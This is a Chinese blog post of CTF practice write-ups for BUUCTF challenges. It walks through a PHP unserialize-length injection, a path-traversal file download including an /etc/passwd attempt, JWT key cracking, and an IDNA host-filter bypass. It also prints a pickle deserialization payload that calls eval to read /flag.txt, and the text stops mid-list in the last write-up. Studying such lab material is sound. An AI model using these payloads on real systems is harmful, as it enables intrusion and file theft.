<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="ctf,">










<meta name="description" content="BUUCTF-0CTF-piapiapia  1.  首先一个登录框  2.  dirsearch扫目录发现源码，可代码审计  3.  审计后发现注册窗口。  4.  注册后可填写姓名之类的信息  5.  config.php提示flag需要包含这个文件。            1      2      3      4      5      6      7">
<meta name="keywords" content="ctf">
<meta property="og:type" content="article">
<meta property="og:title" content="刷题记录">
<meta property="og:url" content="https://srat1999.top/2019/11/30/刷题记录/index.html">
<meta property="og:site_name" content="Stay hungry stay foolish">
<meta property="og:description" content="BUUCTF-0CTF-piapiapia  1.  首先一个登录框  2.  dirsearch扫目录发现源码，可代码审计  3.  审计后发现注册窗口。  4.  注册后可填写姓名之类的信息  5.  config.php提示flag需要包含这个文件。            1      2      3      4      5      6      7">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master//img/Snipaste_2019-11-17_20-55-28.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master//img/Snipaste_2019-11-17_20-52-20.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master//img/Snipaste_2019-11-17_20-53-21.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master//img/Snipaste_2019-11-18_14-58-48.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master//img/Snipaste_2019-11-18_14-53-56.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master//img/Snipaste_2019-11-18_14-53-33.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master//img/Snipaste_2019-11-18_14-57-38.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master//img/Snipaste_2019-11-18_15-04-33.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master//img/Snipaste_2019-11-18_15-06-12.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master//img/Snipaste_2019-11-18_20-57-16.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master//img/Snipaste_2019-11-18_20-30-42.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master//img/Snipaste_2019-11-18_20-35-23.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master//img/Snipaste_2019-11-19_10-23-32.png">
<meta property="og:updated_time" content="2019-11-30T04:28:03.647Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="刷题记录">
<meta name="twitter:description" content="BUUCTF-0CTF-piapiapia  1.  首先一个登录框  2.  dirsearch扫目录发现源码，可代码审计  3.  审计后发现注册窗口。  4.  注册后可填写姓名之类的信息  5.  config.php提示flag需要包含这个文件。            1      2      3      4      5      6      7">
<meta name="twitter:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master//img/Snipaste_2019-11-17_20-55-28.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://srat1999.top/2019/11/30/刷题记录/">





  <title>刷题记录 | Stay hungry stay foolish</title>
  








<link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css"></head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Stay hungry stay foolish</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">srat1999's blog</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="搜索..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://srat1999.top/2019/11/30/刷题记录/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="srat1999">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/uploads/pikachu.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Stay hungry stay foolish">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">刷题记录</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-11-30T11:11:33+08:00">
                2019-11-30
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/ctf/" itemprop="url" rel="index">
                    <span itemprop="name">ctf</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">字数统计&#58;</span>
                
                <span title="字数统计">
                  1.6k
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">阅读时长 &asymp;</span>
                
                <span title="阅读时长">
                  7
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="BUUCTF-0CTF-piapiapia"><a href="#BUUCTF-0CTF-piapiapia" class="headerlink" title="BUUCTF-0CTF-piapiapia"></a>BUUCTF-0CTF-piapiapia</h1><ol>
<li>首先一个登录框</li>
<li>dirsearch扫目录发现源码，可代码审计</li>
<li>审计后发现注册窗口。</li>
<li>注册后可填写姓名之类的信息</li>
<li><p>config.php提示flag需要包含这个文件。</p>
 <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">   <span class="meta">&lt;?php</span></span><br><span class="line">$config[<span class="string">'hostname'</span>] = <span class="string">'127.0.0.1'</span>;</span><br><span class="line">$config[<span class="string">'username'</span>] = <span class="string">'root'</span>;</span><br><span class="line">$config[<span class="string">'password'</span>] = <span class="string">''</span>;</span><br><span class="line">$config[<span class="string">'database'</span>] = <span class="string">''</span>;</span><br><span class="line">$flag = <span class="string">''</span>;</span><br><span class="line">   <span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>在profile.php发现</p>
 <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">   <span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">require_once</span>(<span class="string">'class.php'</span>);</span><br><span class="line"><span class="keyword">if</span>($_SESSION[<span class="string">'username'</span>] == <span class="keyword">null</span>) &#123;</span><br><span class="line">	<span class="keyword">die</span>(<span class="string">'Login First'</span>);	</span><br><span class="line">&#125;</span><br><span class="line">$username = $_SESSION[<span class="string">'username'</span>];</span><br><span class="line">$profile=$user-&gt;show_profile($username);</span><br><span class="line"><span class="keyword">if</span>($profile  == <span class="keyword">null</span>) &#123;</span><br><span class="line">	header(<span class="string">'Location: update.php'</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span> &#123;</span><br><span class="line">	$profile = unserialize($profile);</span><br><span class="line">	$phone = $profile[<span class="string">'phone'</span>];</span><br><span class="line">	$email = $profile[<span class="string">'email'</span>];</span><br><span class="line">	$nickname = $profile[<span class="string">'nickname'</span>];</span><br><span class="line">	$photo = base64_encode(file_get_contents($profile[<span class="string">'photo'</span>]));</span><br><span class="line">   <span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>整体思路已经出来了，需要反序列化使得profile[‘photo’]的值改成<code>config.php</code>。</p>
</li>
<li><p>在update.php中</p>
 <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">  move_uploaded_file($file[<span class="string">'tmp_name'</span>], <span class="string">'upload/'</span> . md5($file[<span class="string">'name'</span>]));</span><br><span class="line">$profile[<span class="string">'phone'</span>] = $_POST[<span class="string">'phone'</span>];</span><br><span class="line">$profile[<span class="string">'email'</span>] = $_POST[<span class="string">'email'</span>];</span><br><span class="line">$profile[<span class="string">'nickname'</span>] = $_POST[<span class="string">'nickname'</span>];</span><br><span class="line">$profile[<span class="string">'photo'</span>] = <span class="string">'upload/'</span> . md5($file[<span class="string">'name'</span>]);</span><br><span class="line">													</span><br><span class="line">      $user-&gt;update_profile($username, serialize($profile));</span><br></pre></td></tr></table></figure>
<p> 看一下<code>update_profile</code>函数</p>
 <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">  <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">update_profile</span><span class="params">($username, $new_profile)</span> </span>&#123;</span><br><span class="line">$username = <span class="keyword">parent</span>::filter($username);</span><br><span class="line">$new_profile = <span class="keyword">parent</span>::filter($new_profile);</span><br><span class="line"></span><br><span class="line">$where = <span class="string">"username = '$username'"</span>;</span><br><span class="line"><span class="keyword">return</span> <span class="keyword">parent</span>::update(<span class="keyword">$this</span>-&gt;table, <span class="string">'profile'</span>, $new_profile, $where);</span><br><span class="line">  &#125;</span><br></pre></td></tr></table></figure>
 <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">  <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">filter</span><span class="params">($string)</span> </span>&#123;</span><br><span class="line">$escape = <span class="keyword">array</span>(<span class="string">'\''</span>, <span class="string">'\\\\'</span>);</span><br><span class="line">$escape = <span class="string">'/'</span> . implode(<span class="string">'|'</span>, $escape) . <span class="string">'/'</span>;</span><br><span class="line">$string = preg_replace($escape, <span class="string">'_'</span>, $string);</span><br><span class="line"></span><br><span class="line">$safe = <span class="keyword">array</span>(<span class="string">'select'</span>, <span class="string">'insert'</span>, <span class="string">'update'</span>, <span class="string">'delete'</span>, <span class="string">'where'</span>);</span><br><span class="line">$safe = <span class="string">'/'</span> . implode(<span class="string">'|'</span>, $safe) . <span class="string">'/i'</span>;</span><br><span class="line"><span class="keyword">return</span> preg_replace($safe, <span class="string">'hacker'</span>, $string);</span><br><span class="line">  &#125;</span><br></pre></td></tr></table></figure>
<p> filter函数对反序列化字串进行过滤<br> ，如果发现<code>$safe</code>数组里的字符串就替换成<code>hacker</code>，也就是测试序列化字符串长度已经改变（确切说是+1）。</p>
</li>
<li><p>在构造之前需要了解一个特性就是php对序列化字符串中无法解析的字符就直接不解析。也就是</p>
 <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">$profile[<span class="string">'phone'</span>] = <span class="string">"123123123"</span>;</span><br><span class="line">$profile[<span class="string">'email'</span>] = <span class="string">"12312312"</span>;</span><br><span class="line">$profile[<span class="string">'nickname'</span>] = <span class="string">"nick"</span>;</span><br><span class="line">$profile[<span class="string">'photo'</span>] = <span class="string">'upload/'</span>.md5(<span class="string">'config.php'</span>);</span><br><span class="line">$e = <span class="string">'a:4:&#123;s:5:"phone";s:9:"123123123";s:5:"email";s:8:"12312312";s:8:"nickname";s:4:"nick";s:5:"photo";s:10:"config.php";&#125;upload/9e5e2527d69c009a81b8ecd730f3957e";&#125;'</span>;</span><br><span class="line"><span class="keyword">print</span> var_dump(unserialize($e));</span><br></pre></td></tr></table></figure>
<p> 结果</p>
 <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">array</span>(<span class="number">4</span>) &#123;</span><br><span class="line">    [<span class="string">"phone"</span>]=&gt;</span><br><span class="line">    string(<span class="number">9</span>) <span class="string">"123123123"</span></span><br><span class="line">    [<span class="string">"email"</span>]=&gt;</span><br><span class="line">    string(<span class="number">8</span>) <span class="string">"12312312"</span></span><br><span class="line">    [<span class="string">"nickname"</span>]=&gt;</span><br><span class="line">    string(<span class="number">4</span>) <span class="string">"nick"</span></span><br><span class="line">    [<span class="string">"photo"</span>]=&gt;</span><br><span class="line">    string(<span class="number">10</span>) <span class="string">"config.php"</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p> 可以看到后面的字符没有解析。</p>
</li>
<li><p>所以我们的想法是对序列化字符串注入，把photo的序列化信息挤掉。需要对nickname进行处理。（因为它莉photo最近。）我们需要在nickname后插入<code>;}s:5:“photo”;s:10:“config.php”;}</code>共34个字符。</p>
</li>
<li><p>基于上面filter函数的替换特性，我们在正常的nickname后添加34个<code>where</code>，这样<code>where</code>-&gt;<code>hacker</code>所多出来的一个字符x34就能容下我们注入的序列化字符串。php会错误将我们注入的字符串解析成photo,的序列化信息。</p>
</li>
<li><p>看下实操</p>
<p>bp改包<br><img src="https://raw.githubusercontent.com/srat1999/Pictures/master//img/Snipaste_2019-11-17_20-55-28.png" alt><br>之后回到profile页面<br><img src="https://raw.githubusercontent.com/srat1999/Pictures/master//img/Snipaste_2019-11-17_20-52-20.png" alt><br><img src="https://raw.githubusercontent.com/srat1999/Pictures/master//img/Snipaste_2019-11-17_20-53-21.png" alt><br>base64解码，可得flag。</p>
</li>
</ol>
<h1 id="BUUCTF-CISCN2019-Dropbox"><a href="#BUUCTF-CISCN2019-Dropbox" class="headerlink" title="BUUCTF-CISCN2019-Dropbox"></a>BUUCTF-CISCN2019-Dropbox</h1><ol>
<li><p>phar协议反序列化</p>
</li>
<li><p>看得还不是太明白，在这里贴个<a href="https://paper.seebug.org/680/" target="_blank" rel="noopener">链接</a>。</p>
</li>
</ol>
<h1 id="BUUCTF-EASYJava"><a href="#BUUCTF-EASYJava" class="headerlink" title="BUUCTF-EASYJava"></a>BUUCTF-EASYJava</h1><ol>
<li><p>开始是一个登陆界面，有一个help按钮，点击<br> <img src="https://raw.githubusercontent.com/srat1999/Pictures/master//img/Snipaste_2019-11-18_14-58-48.png" alt></p>
</li>
<li><p>可能有任意文件下载，试了下<code>../../../../../../../etc/passwd</code>发现不行，看了别人的wp说需要换一下请求方式，也不知道是什么脑洞，这样，可以正常下载：</p>
<p> <img src="https://raw.githubusercontent.com/srat1999/Pictures/master//img/Snipaste_2019-11-18_14-53-56.png" alt></p>
</li>
<li><p>看一下文件内容：</p>
<p> <img src="https://raw.githubusercontent.com/srat1999/Pictures/master//img/Snipaste_2019-11-18_14-53-33.png" alt></p>
</li>
<li><p>这题其实考的是对tomcat容器的熟悉程度，这样才能了解各文件的作用。</p>
</li>
<li><p>基于此可拼接链接下载到flagcontroler的类文件</p>
<p> <img src="https://raw.githubusercontent.com/srat1999/Pictures/master//img/Snipaste_2019-11-18_14-57-38.png" alt></p>
</li>
<li><p>base64解码</p>
<p> <img src="https://raw.githubusercontent.com/srat1999/Pictures/master//img/Snipaste_2019-11-18_15-04-33.png" alt></p>
<p> <img src="https://raw.githubusercontent.com/srat1999/Pictures/master//img/Snipaste_2019-11-18_15-06-12.png" alt></p>
</li>
</ol>
<h1 id="BUUCTF-IKUN—–JWT-PYTHON反序列化"><a href="#BUUCTF-IKUN—–JWT-PYTHON反序列化" class="headerlink" title="BUUCTF-IKUN—–JWT,PYTHON反序列化"></a>BUUCTF-IKUN—–JWT,PYTHON反序列化</h1><ol>
<li><p>首先需要我们购买lv6的账号,需要爆破id，找到含有lv6的页面。附代码：</p>
 <figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> threading</span><br><span class="line"></span><br><span class="line">URL = <span class="string">"http://ecea8740-c713-4ad3-9538-1ca43c68cdb4.node3.buuoj.cn/shop?page=%s"</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">get_find_v6</span><span class="params">(start_id,end_id)</span>:</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> range(start_id,end_id+<span class="number">1</span>):</span><br><span class="line">        res = requests.get(URL%str(i)).text</span><br><span class="line">        <span class="comment"># print(i)</span></span><br><span class="line">        <span class="keyword">if</span> <span class="string">"lv6.png"</span> <span class="keyword">in</span> res:</span><br><span class="line">            print(i)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">"__main__"</span>:</span><br><span class="line">    threads = []</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,<span class="number">21</span>):</span><br><span class="line">        thread = threading.Thread(target=get_find_v6,args=(i*<span class="number">250</span>,(i+<span class="number">1</span>)*<span class="number">250</span>,))</span><br><span class="line">        threads.append(thread)</span><br><span class="line">    print(<span class="string">"start thread"</span>)</span><br><span class="line">    <span class="keyword">for</span> t <span class="keyword">in</span> threads:</span><br><span class="line">        t.start()</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">for</span> t <span class="keyword">in</span> threads:</span><br><span class="line">        t.join()</span><br><span class="line"></span><br><span class="line">    print(<span class="string">"end!"</span>)</span><br></pre></td></tr></table></figure>
</li>
<li><p>得到页面id为181，但我们没有那么多钱购买，bp抓包修改折扣，使价格足够低。</p>
</li>
<li><p>之后我们跳转到admin页面，为<code>b1g_m4mber</code>。但身份验证失败</p>
</li>
<li><p>bp抓包发现cookie里有jwt。需要对jwt进行爆破并拿到key。这里要用到<code>c-jwt-cracker</code>这个工具。</p>
<p> <img src="https://raw.githubusercontent.com/srat1999/Pictures/master//img/Snipaste_2019-11-18_20-57-16.png" alt></p>
</li>
<li><p>爆破密匙后重新生成JWT。</p>
<p> <img src="https://raw.githubusercontent.com/srat1999/Pictures/master//img/Snipaste_2019-11-18_20-30-42.png" alt></p>
</li>
<li><p>替换JWT登陆成功。</p>
<p> <img src="https://raw.githubusercontent.com/srat1999/Pictures/master//img/Snipaste_2019-11-18_20-35-23.png" alt></p>
</li>
<li><p>查看源码发现有提示，可下载源码，审计源码在Admin.py里有pinkle反序列化漏洞。</p>
 <figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@tornado.web.authenticated</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">post</span><span class="params">(self, *args, **kwargs)</span>:</span></span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        become = self.get_argument(<span class="string">'become'</span>)</span><br><span class="line">        p = pickle.loads(urllib.unquote(become))</span><br><span class="line">        <span class="keyword">return</span> self.render(<span class="string">'form.html'</span>, res=p, member=<span class="number">1</span>)</span><br><span class="line">    <span class="keyword">except</span>:</span><br><span class="line">        <span class="keyword">return</span> self.render(<span class="string">'form.html'</span>, res=<span class="string">'This is Black Technology!'</span>, member=<span class="number">0</span>)</span><br></pre></td></tr></table></figure>
</li>
<li><p>python2生成payload</p>
 <figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> pickle</span><br><span class="line"><span class="keyword">import</span> urllib</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">payload</span><span class="params">(object)</span>:</span></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">__reduce__</span><span class="params">(self)</span>:</span></span><br><span class="line">    <span class="keyword">return</span> (eval, (<span class="string">"open('/flag.txt','r').read()"</span>,))</span><br><span class="line"></span><br><span class="line">a = pickle.dumps(payload())</span><br><span class="line">a = urllib.quote(a)</span><br><span class="line"><span class="keyword">print</span> a</span><br></pre></td></tr></table></figure>
</li>
<li><p>用become参数提交可得flag。这里的reduce魔法函数在反序列化杯调用。</p>
<blockquote>
<p>当定义扩展类型时（也就是使用Python的C语言API实现的类型），如果你想pickle它们，你必须告诉Python如何pickle它们。 <strong>reduce</strong> 被定义之后，当对象被Pickle时就会被调&gt;用。它要么返回一个代表全局名称的字符串，Pyhton会查找它并pickle，要么返回一个元组。这个元组包含2到5个元素，其中包括：一个可调用的对象，用于重建对象时调用；一个参数元素，供那个可调用对象使用；被传递给 <strong>setstate</strong> 的状态（可选）；一个产生被pickle的列表元素的迭代器（可选）；一个产生被pickle的字典元素的迭代器（可选）；</p>
</blockquote>
</li>
</ol>
<h1 id="idan编码和UTF-8编码的漏洞，可绕过网站过滤的字符串—-Buuctf-Pythonnigix"><a href="#idan编码和UTF-8编码的漏洞，可绕过网站过滤的字符串—-Buuctf-Pythonnigix" class="headerlink" title="idan编码和UTF-8编码的漏洞，可绕过网站过滤的字符串—-Buuctf-Pythonnigix"></a>idan编码和UTF-8编码的漏洞，可绕过网站过滤的字符串—-Buuctf-Pythonnigix</h1><p><a href="https://www.cnblogs.com/cimuhuashuimu/p/11490431.html" target="_blank" rel="noopener">参考</a></p>
<ol>
<li><p>直接给出源码</p>
 <figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@app.route('/getUrl', methods=['GET', 'POST']) </span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">getUrl</span><span class="params">()</span>:</span> </span><br><span class="line">url = request.args.get(<span class="string">"url"</span>) </span><br><span class="line">host = parse.urlparse(url).hostname </span><br><span class="line"><span class="keyword">if</span> host == <span class="string">'suctf.cc'</span>: </span><br><span class="line">    <span class="keyword">return</span> <span class="string">"我扌 your problem? 111"</span> </span><br><span class="line">parts = list(urlsplit(url)) </span><br><span class="line">host = parts[<span class="number">1</span>] </span><br><span class="line"><span class="keyword">if</span> host == <span class="string">'suctf.cc'</span>: </span><br><span class="line">    <span class="keyword">return</span> <span class="string">"我扌 your problem? 222 "</span> + host </span><br><span class="line">newhost = []</span><br><span class="line"><span class="keyword">for</span> h <span class="keyword">in</span> host.split(<span class="string">'.'</span>): </span><br><span class="line">    newhost.append(h.encode(<span class="string">'idna'</span>).decode(<span class="string">'utf-8'</span>)) </span><br><span class="line">parts[<span class="number">1</span>] = <span class="string">'.'</span>.join(newhost) <span class="comment">#去掉 url 中的空格 </span></span><br><span class="line">finalUrl = urlunsplit(parts).split(<span class="string">' '</span>)[<span class="number">0</span>] </span><br><span class="line">host = parse.urlparse(finalUrl).hostname </span><br><span class="line"><span class="keyword">if</span> host == <span class="string">'suctf.cc'</span>: </span><br><span class="line">    <span class="keyword">return</span> urllib.request.urlopen(finalUrl).read() </span><br><span class="line"><span class="keyword">else</span>: </span><br><span class="line">    <span class="keyword">return</span> <span class="string">"我扌 your problem? 333"</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>我们不能输入域名为<code>suctf.cc</code>,否则程序退出。</p>
</li>
<li><p>看到程序中有对我们输入的urlidan编码后又utf-8</p>
</li>
<li><p>利用这个脚本,可以找到这个字符<code>℆</code>,经过idan-&gt;utf-8变成<code>c/u</code></p>
